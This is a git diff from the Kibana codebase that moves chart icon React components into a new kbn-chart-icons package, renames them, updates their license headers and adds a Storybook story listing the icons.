+1,221 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC, ComponentType } from 'react'; +import { EuiFlexItem, EuiFlexGroup, EuiEmptyPrompt, EuiForm, IconType } from '@elastic/eui'; +import { ComponentStory } from '@storybook/react'; + +import { + IconCircle, + IconTriangle, + EuiIconAxisBottom, + EuiIconAxisLeft, + EuiIconAxisRight, + EuiIconAxisTop, + IconChartArea, + IconChartAreaPercentage, + IconChartAreaStacked, + IconChartBar, + IconChartBarAnnotations, + IconChartBarHorizontal, + IconChartBarHorizontalPercentage, + IconChartBarHorizontalStacked, + IconChartBarPercentage, + IconChartBarReferenceLine, + IconChartBarStacked, + IconChartDatatable, + IconChartDonut, + IconChartLine, + IconChartMetric, + IconChartMixedXy, + IconChartMosaic, + IconChartPie, + IconChartTreemap, + IconChartWaffle, + DropIllustration, + GlobeIllustration, + EuiIconLegend, + IconRegionMap, + IconChartHeatmap, + IconChartHorizontalBullet, + IconChartVerticalBullet, +} from '..'; + +export default { + title: 'Chart Icons', + decorators: [(story: Function) => {story()}], +}; + +const IconsArray: Array<{ + title: string; + Component: ComponentType<{ title: string; titleId: string }>; +}> = [ + { + title: 'EuiIconAxisBottom', + Component: EuiIconAxisBottom, + }, + { + title: 'EuiIconAxisLeft', + Component: EuiIconAxisLeft, + }, + { + title: 'EuiIconAxisRight', + Component: EuiIconAxisRight, + }, + { + title: 'EuiIconAxisTop', + Component: EuiIconAxisTop, + }, + { + title: 'IconChartArea', + Component: IconChartArea, + }, + { + title: 'IconChartAreaPercentage', + Component: IconChartAreaPercentage, + }, + { + title: 'IconChartAreaStacked', + Component: IconChartAreaStacked, + }, + { + title: 'IconChartBar', + Component: IconChartBar, + }, + { + title: 'IconChartBarAnnotations', + Component: IconChartBarAnnotations, + }, + { + title: 'IconChartBarHorizontal', + Component: IconChartBarHorizontal, + }, + { + title: 'IconChartBarHorizontalPercentage', + Component: IconChartBarHorizontalPercentage, + }, + { + title: 'IconChartBarHorizontalStacked', + Component: IconChartBarHorizontalStacked, + }, + { + title: 'IconChartBarPercentage', + Component: IconChartBarPercentage, + }, + { + title: 'IconChartBarReferenceLine', + Component: IconChartBarReferenceLine, + }, + { + title: 'IconChartBarStacked', + Component: IconChartBarStacked, + }, + { + title: 'IconChartDatatable', + Component: IconChartDatatable, + }, + { + title: 'IconChartDonut', + Component: IconChartDonut, + }, + { + title: 'IconChartLine', + Component: IconChartLine, + }, + { + title: 'IconChartMetric', + Component: IconChartMetric, + }, + { + title: 'IconChartMixedXy', + Component: IconChartMixedXy, + }, + { + title: 'IconChartMosaic', + Component: IconChartMosaic, + }, + { + title: 'IconChartPie', + Component: IconChartPie, + }, + { + title: 'IconChartTreemap', + Component: IconChartTreemap, + }, + { + title: 'IconChartWaffle', + Component: IconChartWaffle, + }, + { + title: 'DropIllustration', + Component: DropIllustration, + }, + { + title: 'GlobeIllustration', + Component: GlobeIllustration, + }, + { + title: 'EuiIconLegend', + Component: EuiIconLegend, + }, + { + title: 'IconCircle', + Component: IconCircle, + }, + { + title: 'IconTriangle', + Component: IconTriangle, + }, + { + title: 'IconRegionMap', + Component: IconRegionMap, + }, + { + title: 'IconChartHeatmap', + Component: IconChartHeatmap, + }, + { + title: 'IconChartHorizontalBullet', + Component: IconChartHorizontalBullet, + }, + { + title: 'IconChartVerticalBullet', + Component: IconChartVerticalBullet, + }, +]; + +interface RootComponentProps { + icons: typeof IconsArray; +} + +function RootComponent(props: RootComponentProps) { + return ( + + {props.icons.map((i) => ( + + {i.title}} + titleSize={'s'} + /> + + ))} + + ); +} + +const Template: ComponentStory> = (args) => ; + +export const Default = Template.bind({}); + +Default.args = { + icons: IconsArray, +}; diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx b/packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx rename to packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx index 39bbe5cde74de..d3cb3789138f1 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/circle.tsx +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/circle.tsx @@ -8,9 +8,10 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; +import { cx } from '@emotion/css'; +import { noFill } from '../common_styles'; -export const CircleIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconCircle = ({ title, titleId, ...props }: Omit) => ( diff --git a/src/plugins/vis_types/xy/public/config/index.ts b/packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx similarity index 81% rename from src/plugins/vis_types/xy/public/config/index.ts rename to packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx index b00d6aea3d356..a776717cfe3c5 100644 --- a/src/plugins/vis_types/xy/public/config/index.ts +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/index.tsx @@ -6,5 +6,5 @@ * Side Public License, v 1. */ -export { getConfig } from './get_config'; -export { getAggId } from './get_agg_id'; +export { IconCircle } from './circle'; +export { IconTriangle } from './triangle'; diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx b/packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx rename to packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx index 8ffb8c490d9a4..227dc84335821 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/triangle.tsx +++ b/packages/kbn-chart-icons/src/assets/annotation_icons/triangle.tsx @@ -8,9 +8,10 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; -import classnames from 'classnames'; +import { cx } from '@emotion/css'; +import { noFill } from '../common_styles'; -export const TriangleIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconTriangle = ({ title, titleId, ...props }: Omit) => ( ); diff --git a/x-pack/plugins/lens/public/assets/axis_bottom.tsx b/packages/kbn-chart-icons/src/assets/axis_bottom.tsx similarity index 82% rename from x-pack/plugins/lens/public/assets/axis_bottom.tsx rename to packages/kbn-chart-icons/src/assets/axis_bottom.tsx index 309d41bf24221..c2ad925a962de 100644 --- a/x-pack/plugins/lens/public/assets/axis_bottom.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_bottom.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisBottom = ({ title, diff --git a/x-pack/plugins/lens/public/assets/axis_left.tsx b/packages/kbn-chart-icons/src/assets/axis_left.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/axis_left.tsx rename to packages/kbn-chart-icons/src/assets/axis_left.tsx index 9a39a2f43a74d..e4d4361ecfe75 100644 --- a/x-pack/plugins/lens/public/assets/axis_left.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_left.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisLeft = ({ title, diff --git a/x-pack/plugins/lens/public/assets/axis_right.tsx b/packages/kbn-chart-icons/src/assets/axis_right.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/axis_right.tsx rename to packages/kbn-chart-icons/src/assets/axis_right.tsx index 4db6fc06d82fa..8316fbe713388 100644 --- a/x-pack/plugins/lens/public/assets/axis_right.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_right.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisRight = ({ title, diff --git a/x-pack/plugins/lens/public/assets/axis_top.tsx b/packages/kbn-chart-icons/src/assets/axis_top.tsx similarity index 92% rename from x-pack/plugins/lens/public/assets/axis_top.tsx rename to packages/kbn-chart-icons/src/assets/axis_top.tsx index 2c3dc0744c068..d78dfcc113aad 100644 --- a/x-pack/plugins/lens/public/assets/axis_top.tsx +++ b/packages/kbn-chart-icons/src/assets/axis_top.tsx @@ -1,11 +1,12 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ -import * as React from 'react'; +import React from 'react'; export const EuiIconAxisTop = ({ title, diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/area.tsx b/packages/kbn-chart-icons/src/assets/chart_area.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/area.tsx rename to packages/kbn-chart-icons/src/assets/chart_area.tsx index 010ffaf1fb7ec..a09a9cab956ad 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/area.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const AreaIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartArea = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_area_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx similarity index 82% rename from x-pack/plugins/lens/public/assets/chart_area_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx index 910d5dc817289..07917b1bcabc2 100644 --- a/x-pack/plugins/lens/public/assets/chart_area_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area_percentage.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartAreaPercentage = ({ +export const IconChartAreaPercentage = ({ title, titleId, ...props @@ -25,11 +27,11 @@ export const LensIconChartAreaPercentage = ({ {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_area_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx similarity index 79% rename from x-pack/plugins/lens/public/assets/chart_area_stacked.tsx rename to packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx index 16e1ff849b609..3bfe3cd92b85b 100644 --- a/x-pack/plugins/lens/public/assets/chart_area_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_area_stacked.tsx @@ -1,18 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartAreaStacked = ({ - title, - titleId, - ...props -}: Omit) => ( +export const IconChartAreaStacked = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx b/packages/kbn-chart-icons/src/assets/chart_bar.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar.tsx index f134d7871bfde..f33b83fca5362 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBar = ({ title, titleId, ...props }: Omit) => ( {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx similarity index 73% rename from x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx index 63fc9023533f6..9472cbc0cd762 100644 --- a/x-pack/plugins/lens/public/assets/chart_bar_annotations.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_annotations.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartBarAnnotations = ({ +export const IconChartBarAnnotations = ({ title, titleId, ...props @@ -25,11 +27,11 @@ export const LensIconChartBarAnnotations = ({ {title ? {title} : null} diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx index a2fb843cb095d..dc113a8ab4ad9 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal.tsx @@ -8,8 +8,13 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarHorizontal = ({ + title, + titleId, + ...props +}: Omit) => ( {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx similarity index 87% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx index 6b2bb61a246e1..91e8f2639bfa5 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_percentage.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalPercentageIcon = ({ +export const IconChartBarHorizontalPercentage = ({ title, titleId, ...props @@ -26,11 +27,11 @@ export const BarHorizontalPercentageIcon = ({ {title ? {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx similarity index 87% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx index b399c47d3fc7d..6e5e61e386467 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_horizontal_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_horizontal_stacked.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarHorizontalStackedIcon = ({ +export const IconChartBarHorizontalStacked = ({ title, titleId, ...props @@ -26,11 +27,11 @@ export const BarHorizontalStackedIcon = ({ {title ? {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx similarity index 82% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx index 64514cea6c012..82a59ebc9be32 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_percentage.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_percentage.tsx @@ -8,8 +8,13 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarPercentageIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarPercentage = ({ + title, + titleId, + ...props +}: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx similarity index 79% rename from x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx index 447641540a284..d8cca5a3f1192 100644 --- a/x-pack/plugins/lens/public/assets/chart_bar_reference_line.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_reference_line.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartBarReferenceLine = ({ +export const IconChartBarReferenceLine = ({ title, titleId, ...props @@ -25,16 +27,10 @@ export const LensIconChartBarReferenceLine = ({ {title ? {title} : null} - + ); diff --git a/src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx b/packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx similarity index 83% rename from src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx rename to packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx index 833f3d0e816e6..933be6d5dea7a 100644 --- a/src/plugins/chart_expressions/expression_xy/public/icons/bar_stacked.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_bar_stacked.tsx @@ -8,8 +8,9 @@ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const BarStackedIcon = ({ title, titleId, ...props }: Omit) => ( +export const IconChartBarStacked = ({ title, titleId, ...props }: Omit) => ( {title ? {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_datatable.tsx b/packages/kbn-chart-icons/src/assets/chart_datatable.tsx similarity index 75% rename from x-pack/plugins/lens/public/assets/chart_datatable.tsx rename to packages/kbn-chart-icons/src/assets/chart_datatable.tsx index d6a5cb733e1e1..144d6ddb906f5 100644 --- a/x-pack/plugins/lens/public/assets/chart_datatable.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_datatable.tsx @@ -1,18 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartDatatable = ({ - title, - titleId, - ...props -}: Omit) => ( +export const IconChartDatatable = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_donut.tsx b/packages/kbn-chart-icons/src/assets/chart_donut.tsx similarity index 71% rename from x-pack/plugins/lens/public/assets/chart_donut.tsx rename to packages/kbn-chart-icons/src/assets/chart_donut.tsx index f2ce65a1f2e19..bd9e3f59e72a1 100644 --- a/x-pack/plugins/lens/public/assets/chart_donut.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_donut.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartDonut = ({ title, titleId, ...props }: Omit) => ( +export const IconChartDonut = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_heatmap.tsx similarity index 85% rename from src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_heatmap.tsx index 7a49d53222946..0609c7263f202 100644 --- a/src/plugins/chart_expressions/expression_heatmap/public/components/heatmap_icon.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_heatmap.tsx @@ -8,11 +8,9 @@ import { EuiIconProps } from '@elastic/eui'; import React from 'react'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const HeatmapIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartHeatmap = ({ title, titleId, ...props }: Omit) => { return ( {title ? {title} : null} diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx similarity index 80% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx index 5074f00801109..0765444e857a6 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/horizontal_bullet_icon.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_horizontal_bullet.tsx @@ -8,11 +8,13 @@ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; -import { useCommonChartStyles } from '@kbn/charts-plugin/public'; - -export const HorizontalBulletIcon = ({ title, titleId, ...props }: Omit) => { - const { chartIcon } = useCommonChartStyles(); +import { colors } from './common_styles'; +export const IconChartHorizontalBullet = ({ + title, + titleId, + ...props +}: Omit) => { return ( {title ? {title} : null} diff --git a/x-pack/plugins/lens/public/assets/chart_line.tsx b/packages/kbn-chart-icons/src/assets/chart_line.tsx similarity index 83% rename from x-pack/plugins/lens/public/assets/chart_line.tsx rename to packages/kbn-chart-icons/src/assets/chart_line.tsx index 82df68d8fd43c..afaf31b708621 100644 --- a/x-pack/plugins/lens/public/assets/chart_line.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_line.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartLine = ({ title, titleId, ...props }: Omit) => ( +export const IconChartLine = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_metric.tsx b/packages/kbn-chart-icons/src/assets/chart_metric.tsx similarity index 75% rename from x-pack/plugins/lens/public/assets/chart_metric.tsx rename to packages/kbn-chart-icons/src/assets/chart_metric.tsx index d15be760eec60..4feb162a4607c 100644 --- a/x-pack/plugins/lens/public/assets/chart_metric.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_metric.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMetric = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMetric = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx b/packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx similarity index 84% rename from x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx rename to packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx index bb213217a9fa9..af86b96852dc9 100644 --- a/x-pack/plugins/lens/public/assets/chart_mixed_xy.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_mixed_xy.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMixedXy = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMixedXy = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_mosaic.tsx b/packages/kbn-chart-icons/src/assets/chart_mosaic.tsx similarity index 73% rename from x-pack/plugins/lens/public/assets/chart_mosaic.tsx rename to packages/kbn-chart-icons/src/assets/chart_mosaic.tsx index c385f0df1a008..23fe548074d5a 100644 --- a/x-pack/plugins/lens/public/assets/chart_mosaic.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_mosaic.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import type { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartMosaic = ({ title, titleId, ...props }: Omit) => ( +export const IconChartMosaic = ({ title, titleId, ...props }: Omit) => ( {title ? : null} diff --git a/x-pack/plugins/lens/public/assets/chart_pie.tsx b/packages/kbn-chart-icons/src/assets/chart_pie.tsx similarity index 68% rename from x-pack/plugins/lens/public/assets/chart_pie.tsx rename to packages/kbn-chart-icons/src/assets/chart_pie.tsx index 56a18b9d61624..16d59e73603ca 100644 --- a/x-pack/plugins/lens/public/assets/chart_pie.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_pie.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartPie = ({ title, titleId, ...props }: Omit) => ( +export const IconChartPie = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/x-pack/plugins/lens/public/assets/chart_treemap.tsx b/packages/kbn-chart-icons/src/assets/chart_treemap.tsx similarity index 64% rename from x-pack/plugins/lens/public/assets/chart_treemap.tsx rename to packages/kbn-chart-icons/src/assets/chart_treemap.tsx index c56fdedfebdf7..587682994102a 100644 --- a/x-pack/plugins/lens/public/assets/chart_treemap.tsx +++ b/packages/kbn-chart-icons/src/assets/chart_treemap.tsx @@ -1,14 +1,16 @@ /* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. */ import React from 'react'; import { EuiIconProps } from '@elastic/eui'; +import { colors } from './common_styles'; -export const LensIconChartTreemap = ({ title, titleId, ...props }: Omit) => ( +export const IconChartTreemap = ({ title, titleId, ...props }: Omit) => ( {title} : null} ); diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx b/packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx similarity index 77% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx rename to packages/kbn-chart-icons/src/assets/chart_vertical_bullet.tsx index 49a1e2a817cf7..5cf427af7d238 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/vertical_bullet_icon.tsx +++ 